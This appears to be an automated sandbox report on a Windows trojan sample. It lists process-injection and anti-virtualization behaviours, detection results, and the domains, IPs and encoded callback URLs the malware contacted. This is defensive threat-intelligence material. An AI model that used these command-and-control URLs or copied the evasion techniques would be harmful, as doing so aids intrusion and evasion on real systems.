          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412308 Sample: 350969bc_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 35 www.woo.education 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 6 other signatures 2->49 11 350969bc_by_Libranalysis.exe 3 2->11         started        signatures3 process4 file5 33 C:\Users\...\350969bc_by_Libranalysis.exe.log, ASCII 11->33 dropped 59 Tries to detect virtualization through RDTSC time measurements 11->59 15 350969bc_by_Libranalysis.exe 11->15         started        18 350969bc_by_Libranalysis.exe 11->18         started        20 350969bc_by_Libranalysis.exe 11->20         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 22 explorer.exe 15->22 injected process9 dnsIp10 37 www.sabaidiving.com 192.64.147.164, 49771, 80 VOODOO1US United States 22->37 39 cityofhouston.info 103.15.186.68, 49764, 80 VECTANTARTERIANetworksCorporationJP Japan 22->39 41 19 other IPs or domains 22->41 51 System process connects to network (likely due to code injection or exploit) 22->51 26 control.exe 22->26         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 26->53 55 Maps a DLL or memory area into another process 26->55 57 Tries to detect virtualization through RDTSC time measurements 26->57 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          350969bc_by_Libranalysis.exe36%ReversingLabsWin32.Trojan.Wacatac
          350969bc_by_Libranalysis.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.350969bc_by_Libranalysis.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          cityofhouston.info0%VirustotalBrowse
          onlinecasinocrazy.com0%VirustotalBrowse
          onemoresysadmin.com0%VirustotalBrowse
          www.sabaidiving.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.toypoodlebreedershome.com/i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.ximibabes.com/i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.cityofhouston.info/i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.sabaidiving.com/i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.onemoresysadmin.com/i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.countrywideeconomy.com0%Avira URL Cloudsafe
          http://www.onlinecasinocrazy.com/i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.thebenefitssherpa.com/i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.ricdevan.com/i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.sabaidiving.com/i6rd/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.blissfulbeeboutique.online/i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.countrywideeconomy.com/0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.countrywideeconomy.com/i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cityofhouston.info
          		103.15.186.68
          		truetrueunknown
          onlinecasinocrazy.com
          		119.81.45.82
          		truetrueunknown
          onemoresysadmin.com
          		192.0.78.24
          		truetrueunknown
          www.sabaidiving.com
          		192.64.147.164
          		truetrueunknown
          ext-sq.squarespace.com
          		198.185.159.144
          		truefalse
            		high
            toypoodlebreedershome.com
            		81.88.52.88
            		truetrue
              		unknown
              www.ricdevan.com
              		185.53.177.53
              		truetrue
                		unknown
                shops.myshopify.com
                		23.227.38.74
                		truetrue
                  		unknown
                  thebenefitssherpa.com
                  		34.102.136.180
                  		truefalse
                    		unknown
                    www.countrywideeconomy.com
                    		52.58.78.16
                    		truetrue
                      		unknown
                      socialeconomic.net
                      		51.222.80.112
                      		truetrue
                        		unknown
                        www.socialeconomic.net
                        		unknown
                        		unknowntrue
                          		unknown
                          www.onlinecasinocrazy.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.toypoodlebreedershome.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.onemoresysadmin.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.woo.education
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.cityofhouston.info
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.thebenefitssherpa.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.blissfulbeeboutique.online
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.ximibabes.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.toypoodlebreedershome.com/i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ximibabes.com/i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cityofhouston.info/i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sabaidiving.com/i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.onemoresysadmin.com/i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.onlinecasinocrazy.com/i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.thebenefitssherpa.com/i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZihfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ricdevan.com/i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          www.sabaidiving.com/i6rd/true
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.blissfulbeeboutique.online/i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.countrywideeconomy.com/i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZihtrue
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designersGexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers/?explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers?explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.tiro.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.countrywideeconomy.comcontrol.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.goodfont.co.krexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.carterandcone.comlexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sajatypeworks.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.typography.netDexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://fontfabrik.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cnexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.countrywideeconomy.com/control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.%s.comPAexplorer.exe, 00000006.00000000.666349326.0000000002B50000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		low
                                                              http://www.fonts.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name350969bc_by_Libranalysis.exe, 00000000.00000002.662905887.0000000003441000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.sakkal.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  52.58.78.16
                                                                  		www.countrywideeconomy.comUnited States
                                                                  		16509AMAZON-02UStrue
                                                                  192.64.147.164
                                                                  		www.sabaidiving.comUnited States
                                                                  		19867VOODOO1UStrue
                                                                  23.227.38.74
                                                                  		shops.myshopify.comCanada
                                                                  		13335CLOUDFLARENETUStrue
                                                                  192.0.78.24
                                                                  		onemoresysadmin.comUnited States
                                                                  		2635AUTOMATTICUStrue
                                                                  119.81.45.82
                                                                  		onlinecasinocrazy.comSingapore
                                                                  		36351SOFTLAYERUStrue
                                                                  198.185.159.144
                                                                  		ext-sq.squarespace.comUnited States
                                                                  		53831SQUARESPACEUSfalse
                                                                  185.53.177.53
                                                                  		www.ricdevan.comGermany
                                                                  		61969TEAMINTERNET-ASDEtrue
                                                                  103.15.186.68
                                                                  		cityofhouston.infoJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                                                  34.102.136.180
                                                                  		thebenefitssherpa.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  81.88.52.88
                                                                  		toypoodlebreedershome.comItaly
                                                                  		39729REGISTER-ASITtrue
                                                                  51.222.80.112
                                                                  		socialeconomic.netFrance
                                                                  		16276OVHFRtrue

                                                                  Private

                                                                  IP
                                                                  192.168.2.1

                                                                  General Information

                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                  Analysis ID:412308
                                                                  Start date:12.05.2021
                                                                  Start time:15:45:53
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 12m 34s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:350969bc_by_Libranalysis (renamed file extension from none to exe)
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:23
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@11/1@12/12
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 18.4% (good quality ratio 16.3%)
                                                                  • Quality average: 73.4%
                                                                  • Quality standard deviation: 32.1%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  Warnings:
                                                                  Show All
                                                                  • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 92.122.145.220, 13.64.90.137, 13.88.21.125, 20.82.209.183, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.143.16, 52.155.217.156, 20.54.26.129, 20.82.210.154
                                                                  • TCP Packets have been reduced to 100
                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  15:46:44API Interceptor1x Sleep call for process: 350969bc_by_Libranalysis.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  52.58.78.16Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                                                  • www.rjroof.com/bwk/?e0D=4vdMJUauAbypOyncIj3mGOWyxqKYmFP7MPVjyJX0TlZ6LShEClzNARe6HqJLDWz2QsFLyUFcIg==&BRGTb0=DBZH
                                                                  ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                                                  • www.rafbar.com/u8nw/?hb8Tz=GTZNlL4u2lC1Us00w2siTAOBcwC+lUBY5op6as4vfiu2ndyHOwS1IzefqZ0oX9Ljvrcn&yVUx=0BIXczdHaL8h5fn
                                                                  0a97784c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                  • www.bestpontoonboat.com/et9g/?BZ6=bBMyEahAcXigOvOPgDjmms/4cBV9Wtmdu7/aEd/RWaUwIJILZbsGRx753LFyRZeZoLA0QA==&bdC=7njp7th
                                                                  Shipping Document.exeGet hashmaliciousBrowse
                                                                  • www.ehealthwy.com/ou59/?nHLD_b=F/wBt/KMP43Itvrx2w7vOpterTaFFbpTrndkSW8YN3woe1RwD49jldLS4YHInyjjH0Fk&kr4Lhj=ndkHzHd
                                                                  abc73f63_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • www.fortwayneduiattorney.com/cca/?LFQLf=DQkKoy4KFmxrpP+4wA/zfG9zgCj3jVN+xnDVxHHDydHerh6N5kUzh47H2mi7uCO64HHP4Q==&PHBtKJ=OlrtB4dp
                                                                  tgix.exeGet hashmaliciousBrowse
                                                                  • www.physicalrobot.com/oerg/?AtxLpld=JA3D/Abhc4IR3OQLXeXKb6LQIfBkcHsKg4Z3iScHpk6TVSXolV0c13rIH8GpTmaDfWWP&orW=W6L4IdAHz
                                                                  60b88477_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • www.relaxxation.com/qjnt/?_nLD=mxaFhsYrAcL/dG/heClqDIL9OHFKPqnw/WCTkSguw47Ni2/IMxTsh2aodb9jmZlwyzTK1xgprg==&m0D=AL30QHY
                                                                  e9777bb4_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • www.vaginalmedicine.com/m3rc/?w8i=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTfc9FuV2tCtq&CR=CpCH
                                                                  NEW ORDER.exeGet hashmaliciousBrowse
                                                                  • www.sanacolitademarijuana.com/u8nw/?GVIp=9bHYKsyT0auyBBl4ZenxQUebR4YwlP18dAkCPCATYDDxMs1xZZCxfJgyFOuaQUe6umYw+kXXjQ==&tzr4=jlIXVLPHc
                                                                  Ygqayrvpsvjdxblkzsmxymjfnxukvrdvft_Signed_.exeGet hashmaliciousBrowse
                                                                  • www.clinics.life/qku9/?sL3x=wPjLqqQ4Fl5oGjCEKguj45taGc7fhq386dHHgSG17iY4BIOMpTzTtH7Yrt22Fdj2vFYG/3Tb+A==&jrq=e4yt
                                                                  pVrqrGltiL.exeGet hashmaliciousBrowse
                                                                  • www.gailrichardson.com/qjnt/?lZ9=cQpYuVHXbJG9pZu9oJObHgw0bCNAclVj5UnrwSBC7KRToOBRDRnUcBg681sl3dckQEofebx0YA==&G8bDQ=7nJx1RS0B4MT9t
                                                                  krJF4BtzSv.exeGet hashmaliciousBrowse
                                                                  • www.hellonetworker.com/oerg/?r6A=2Id0qd+ugAnFeIUXB+gRuO324HEbs4SrVkFnQshNY9xroxdz4sfjr3km3OeVd011T3tb&YL0=8pN4l4
                                                                  70pGP1JaCf6M0kf.exeGet hashmaliciousBrowse
                                                                  • www.hellojesse.com/uv34/?Yn=kz3sMtkI7CkjoxhZIzOZCG4boHCoa7NSqpR26aumet80jxfhILAbk/YVwF8yKbrEfOE+8NWGOA==&I4=i0GhP0sP
                                                                  AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                                  • www.hellojesse.com/uv34/?gjKTUx=6lchmDL0&rnKTobm=kz3sMtkI7CkjoxhZIzOZCG4boHCoa7NSqpR26aumet80jxfhILAbk/YVwGQbJbX8Wtxo
                                                                  triage_dropped_file.exeGet hashmaliciousBrowse
                                                                  • www.gailrichardson.com/qjnt/?rTFDm=GBOxAlxXYbRxGd&r6q=cQpYuVHXbJG9pZu9oJObHgw0bCNAclVj5UnrwSBC7KRToOBRDRnUcBg682AmrtQcdlVJ
                                                                  y6f8O0kbEB.exeGet hashmaliciousBrowse
                                                                  • www.physicalrobot.com/oerg/?mHLD_0=JA3D/Abhc4IR3OQLXeXKb6LQIfBkcHsKg4Z3iScHpk6TVSXolV0c13rIH8GpTmaDfWWP&ndndnZ=UtWlYrO0rhjH
                                                                  PI34567890987.exeGet hashmaliciousBrowse
                                                                  • www.hellojesse.com/uv34/?S0GHnN=RRipariXRTPx&V488O=kz3sMtkI7CkjoxhZIzOZCG4boHCoa7NSqpR26aumet80jxfhILAbk/YVwFwLG6HEIIYv
                                                                  letterhead.exeGet hashmaliciousBrowse
                                                                  • www.adsandbanners.com/epms/?x4uDfZgH=5FcZQLEIPDinAsdvDU7qvUUfCcL2PSB22LbDCeTr+4owrfaQmoWPWt5F0XzMbxfYzfnp&Cj30v=9rJhur7HoF7lOxC
                                                                  PaymentAdvice.exeGet hashmaliciousBrowse
                                                                  • www.wildsoulsport.com/c22b/?Uxlt=kpNK1gW9of23sXec3wB2eGXjTzRpIjACDmlXILuFYpTB5bhnZZGkQZKPt/qXQ/DU3yyv&wP9=mfpP2VH
                                                                  UP3FvzsHWZ.exeGet hashmaliciousBrowse
                                                                  • www.greendaylandscaping.com/r1mo/?uDKH=7Ux04+9wxrtiaQVDDevgGV/B1TtL1QYTp7ylEXK86zgQ//45WeQOOkpXoTmAu+TPv8Ft&-ZPh=1bRpzD

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  ext-sq.squarespace.comPO 367628usa.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  correct invoice.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
